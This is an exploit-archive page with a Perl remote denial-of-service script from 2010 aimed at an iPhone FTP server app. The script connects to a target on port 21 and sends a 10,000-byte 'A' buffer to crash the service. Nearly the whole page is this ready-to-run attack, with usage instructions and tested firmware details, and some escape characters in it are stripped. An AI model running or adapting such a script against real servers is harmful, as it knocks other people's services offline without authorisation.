iPhone FTP Server By Zhang Boyang Remote DoS Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : iPhone FTP Server By Zhang Boyang Remote DoS Exploit
# Published : 2010-02-23
# Author : Ale46
# Previous Title : Free MP3 CD Ripper 2.6 0-day
# Next Title : ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC

#!/usr/bin/perl

#

# Exploit: FTP Server By Zhang Boyang - Remote Dos Exploit

# Date: 24/02/10

# Author: Ale46

# Software Link: http://itunes.apple.com/us/app/ftp-server/id356055128?mt=8

# Version: 1.0

# Tested on: Iphone 3GS with 3.1.2 firmware

# Greetz: Gandalf



use IO::Socket;



if (@ARGV<1){

	print ("[-]tUsage: ./ftpServer <server_ip>n");

	exit();

}

my $host = $ARGV[0];

my $port = 21;

my $stuff = "A"*10000;

my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,

PeerPort => $port);

unless ($socket) { die "Can't connect to $host" }

print "[-]tConnected to FTP Servernn";

sleep(2);

print "[-]tSending evil buffer..nn";

sleep(2);

print $socket $stuff;

sleep(2);

print "[-]tPUAAA..Crashed..n";